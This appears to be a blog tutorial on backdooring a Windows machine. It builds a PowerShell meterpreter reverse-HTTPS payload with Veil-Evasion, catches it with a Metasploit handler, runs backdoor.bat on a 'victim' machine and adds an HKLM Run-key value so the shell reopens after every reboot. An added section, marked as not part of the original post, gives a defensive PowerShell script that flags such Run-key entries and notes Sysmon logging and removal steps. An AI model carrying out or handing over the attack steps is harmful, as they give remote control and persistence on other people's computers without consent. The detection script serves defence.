We will inject a Run-key entry into the victim's registry using PowerShell; the PowerShell payload is created with Veil-Evasion.
First open Veil-Evasion with ./Veil-Evasion.py
Select powershell/meterpreter/rev_https by typing use 23
Check your local IP by typing ifconfig
set LHOST "Your Local IP". Example: set LHOST 192.168.10.211
Set LPORT 9999
info
Generate, and name the output backdoor
Press Enter
Open Metasploit by typing msfconsole in a terminal
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST "Your Local IP". Example: set LHOST 192.168.10.211
set LPORT 9999
exploit
Copy backdoor.bat to the victim and run it on the victim machine.
A Meterpreter session opens.
You can see backdoor.bat on the victim's Desktop; placing it in another folder is also fine.
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 9999 -d "location of backdoor.bat"
Example: reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 9999 -d c:\\Users\\HRD-Andim\\Desktop\\backdoor.bat
You can check the victim's registry: you have created a value named 9999 under the Run key.
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 9999
Restart the victim machine and Meterpreter session 2 will open.
Then finish. The backdoor will reopen every time, even after the victim turns off and restarts the computer.
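The persistence above relies on a value under the HKLM Run key that points at a batch file on a user's Desktop. The following PowerShell script is an added defender-side example, not part of the original post, that audits the HKLM and HKCU Run/RunOnce keys and flags exactly that pattern: launchers that are script files, live in user-writable paths, or carry a bare numeric name like 9999. It assumes it is run from an elevated Windows PowerShell 5.1 or PowerShell 7 session on the machine being checked; the list of suspicious extensions and paths is a constructed starting point, not an exhaustive one.

```powershell
# Added example (not from the original post): audit autorun registry keys for
# entries that look like the Run-key persistence described above.

$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Constructed indicator lists: script launchers and user-writable locations
# rarely belong in a legitimate autorun entry.
$scriptExtensions = @('.bat', '.cmd', '.ps1', '.vbs', '.js', '.hta')
$userWritable     = @('\Users\', '\Temp\', '\AppData\', '\ProgramData\', '\Public\')

function Get-AutorunFindings {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            # Get-ItemProperty adds PSPath/PSParentPath/... metadata; skip those.
            if ($p.Name -like 'PS*') { continue }
            $value   = [string]$p.Value
            $reasons = @()

            # -match is case-insensitive by default; escape the literal fragments.
            if ($scriptExtensions | Where-Object { $value -match [regex]::Escape($_) }) {
                $reasons += 'script-file launcher'
            }
            if ($userWritable | Where-Object { $value -match [regex]::Escape($_) }) {
                $reasons += 'user-writable location'
            }
            if ($p.Name -match '^\d+$') {
                $reasons += 'numeric value name'   # e.g. "9999" instead of a product name
            }

            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Key     = $key
                    Name    = $p.Name
                    Command = $value
                    Reasons = ($reasons -join ', ')
                }
            }
        }
    }
}

# Print every suspicious entry; an empty table means nothing matched the indicators.
Get-AutorunFindings | Format-Table -AutoSize
```

Run it periodically or from an endpoint-management job and review anything it lists; the entry created in this tutorial (`9999` pointing at `c:\Users\...\Desktop\backdoor.bat`) would be reported with all three reasons. For real-time coverage of the same keys, Sysmon Event ID 13 (RegistryEvent, value set) records each write to these Run keys together with the process that made it, and removing a rogue entry is a matter of `Remove-ItemProperty -Path <key> -Name <value>` followed by deleting the launcher file it pointed at.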
Thanks.. :)
0 Response to "Auto Exploit Windows Using Powershell"